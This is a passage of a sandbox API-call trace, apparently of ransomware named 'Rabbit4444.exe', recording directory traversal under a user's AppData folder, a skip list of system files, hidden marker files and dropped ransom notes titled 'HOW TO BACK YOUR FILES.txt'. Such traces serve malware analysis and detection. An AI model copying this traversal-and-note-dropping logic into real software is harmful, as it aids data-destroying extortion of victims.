(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.606] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.606] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.606] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.606] CloseHandle (hObject=0x27c) returned 1 [0066.606] CloseHandle (hObject=0x228) returned 1 [0066.606] GetCurrentThreadId () returned 0xd98 [0066.606] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122108 [0066.606] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC" [0066.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116040 | out: hHeap=0xe0000) returned 1 [0066.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122100 | out: hHeap=0xe0000) returned 1 [0066.606] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC" [0066.607] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\" [0066.607] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" [0066.607] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.609] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.612] FlushFileBuffers (hFile=0x228) returned 1 [0066.612] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.613] CloseHandle (hObject=0x228) returned 1 [0066.613] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC") returned 98 [0066.613] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.613] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x74b8500e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b8500e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf106d549, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1028d0 [0066.613] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.613] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.613] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.613] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.613] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x74b8500e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b8500e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf106d549, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.614] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.614] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.614] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.614] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.614] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.614] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf106d549, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf106d549, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf106d549, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.614] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.614] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.614] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x74b8500e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b8500e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74b8500e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0066.614] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.614] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.614] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0066.614] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0066.614] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0066.614] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0066.614] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0066.614] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0066.614] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0066.614] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0066.614] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0066.614] lstrcpyW (in: lpString1=0x130ebfe, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0066.614] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0066.614] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122220 [0066.615] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xda) returned 0x125658 [0066.615] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122228 | out: ListHead=0xf68b0, ListEntry=0x122228) returned 0x11d0e8 [0066.615] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x74b8500e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b8500e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74b8500e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0066.615] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.615] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.615] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0066.615] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0066.615] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0066.615] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0066.615] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0066.615] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0066.615] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0066.615] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0066.615] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0066.615] lstrcpyW (in: lpString1=0x130ebfe, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0066.615] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0066.617] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0066.617] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xde) returned 0x126138 [0066.617] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x122228 [0066.617] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x74b8500e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b8500e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74b8500e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0066.617] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.617] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.617] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0066.617] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0066.617] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0066.617] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0066.617] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0066.617] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0066.617] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0066.617] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0066.617] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0066.617] lstrcpyW (in: lpString1=0x130ebfe, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0066.617] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0066.618] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122320 [0066.618] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xde) returned 0x1259f8 [0066.618] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122328 | out: ListHead=0xf68b0, ListEntry=0x122328) returned 0x122128 [0066.618] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b8500e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b8500e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74b8500e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0066.618] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.618] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.618] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0066.618] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0066.618] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0066.618] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0066.618] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0066.618] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0066.618] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0066.618] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0066.618] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0066.618] lstrcpyW (in: lpString1=0x130ebfe, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0066.618] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122280 [0066.618] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd0) returned 0x108688 [0066.618] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122288 | out: ListHead=0xf68b0, ListEntry=0x122288) returned 0x122328 [0066.618] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b8500e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b8500e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74b8500e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0066.618] FindClose (in: hFindFile=0x1028d0 | out: hFindFile=0x1028d0) returned 1 [0066.618] lstrcpyW (in: lpString1=0x130ebfe, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.619] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.619] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.619] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.620] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.620] CloseHandle (hObject=0x27c) returned 1 [0066.620] CloseHandle (hObject=0x228) returned 1 [0066.620] GetCurrentThreadId () returned 0xd98 [0066.620] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122288 [0066.620] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\Temp" [0066.620] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108688 | out: hHeap=0xe0000) returned 1 [0066.620] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122280 | out: hHeap=0xe0000) returned 1 [0066.620] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\Temp" [0066.620] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\Temp\\" [0066.620] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0066.620] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.622] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.625] FlushFileBuffers (hFile=0x228) returned 1 [0066.626] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.626] CloseHandle (hObject=0x228) returned 1 [0066.628] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\Temp") returned 103 [0066.628] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.628] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b8500e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b8500e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf109384b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1028d0 [0066.628] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.628] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.628] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.628] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.628] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b8500e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b8500e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf109384b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.628] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.628] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.628] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.628] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.628] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.628] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf109384b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf109384b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf109384b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.628] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.629] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.629] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf109384b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf109384b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf109384b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.629] FindClose (in: hFindFile=0x1028d0 | out: hFindFile=0x1028d0) returned 1 [0066.629] lstrcpyW (in: lpString1=0x130ec08, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.629] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.629] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.629] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.630] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.630] CloseHandle (hObject=0x27c) returned 1 [0066.630] CloseHandle (hObject=0x228) returned 1 [0066.630] GetCurrentThreadId () returned 0xd98 [0066.630] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122328 [0066.630] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\AC\\INetHistory" [0066.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1259f8 | out: hHeap=0xe0000) returned 1 [0066.630] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122320 | out: hHeap=0xe0000) returned 1 [0066.630] lstrcatW 